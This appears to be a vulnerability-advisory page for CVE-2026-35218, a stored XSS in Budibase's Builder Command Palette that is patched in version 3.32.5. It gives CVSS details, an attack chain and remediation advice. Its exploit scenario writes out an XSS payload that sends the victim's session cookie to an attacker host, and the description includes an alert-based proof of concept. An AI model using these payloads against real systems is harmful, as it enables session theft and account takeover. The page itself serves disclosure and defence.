Skip to main content

Budibase EUVD-2026-18797

| CVE-2026-35218 HIGH
Cross-site Scripting (XSS) (CWE-79)
2026-04-03 GitHub_M
8.7
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.7 HIGH
AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

6
Analysis Updated
Apr 16, 2026 - 06:07 EUVD-patch-fix
executive_summary
Re-analysis Queued
Apr 16, 2026 - 05:29 backfill_euvd_patch
patch_released
Patch available
Apr 16, 2026 - 05:29 EUVD
3.32.5
EUVD ID Assigned
Apr 03, 2026 - 16:00 euvd
EUVD-2026-18797
Analysis Generated
Apr 03, 2026 - 16:00 vuln.today
CVE Published
Apr 03, 2026 - 15:47 nvd
HIGH 8.7

DescriptionGitHub Advisory

Budibase is an open-source low-code platform. Prior to version 3.32.5, Budibase's Builder Command Palette renders entity names (tables, views, queries, automations) using Svelte's {@html} directive without any sanitization. An authenticated user with Builder access can create a table, automation, view, or query whose name contains an HTML payload (e.g. <img src=x onerror=alert(document.domain)>). When any Builder-role user in the same workspace opens the Command Palette (Ctrl+K), the payload executes in their browser, stealing their session cookie and enabling full account takeover. This issue has been patched in version 3.32.5.

AnalysisAI

Stored cross-site scripting (XSS) in Budibase's Builder Command Palette (versions prior to 3.32.5) enables authenticated Builder users to inject malicious HTML payloads via entity names (tables, views, queries, automations), achieving session hijacking and account takeover when other Builder-role users invoke the Command Palette. CVSS 8.7 with changed scope reflects the cross-user attack vector. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Create table with HTML payload in name
Delivery
Victim opens Command Palette in Budibase Builder
Exploit
Svelte renders unsanitized payload
Execution
JavaScript executes stealing session cookie
Impact
Attacker hijacks victim account

Vulnerability AssessmentAI

Exploitation Requires authenticated Budibase Builder-role access to create a malicious entity (table, automation, view, or query) with HTML payload in its name. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Real-world risk is elevated for multi-user Budibase deployments with multiple Builder-role accounts. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An authenticated insider (disgruntled developer, compromised contractor account, or malicious team member) with Builder privileges logs into a shared Budibase workspace and creates a new table named <img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>. When the workspace administrator or another Builder user opens the Command Palette (Ctrl+K) to search entities during normal workflow, the malicious entity name renders via {@html}, executing the JavaScript payload. …
Remediation Vendor-released patch: Upgrade to Budibase version 3.32.5 or later, available at https://github.com/Budibase/budibase/releases/tag/3.32.5. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all Budibase instances and confirm current version via administration console. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-18797 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy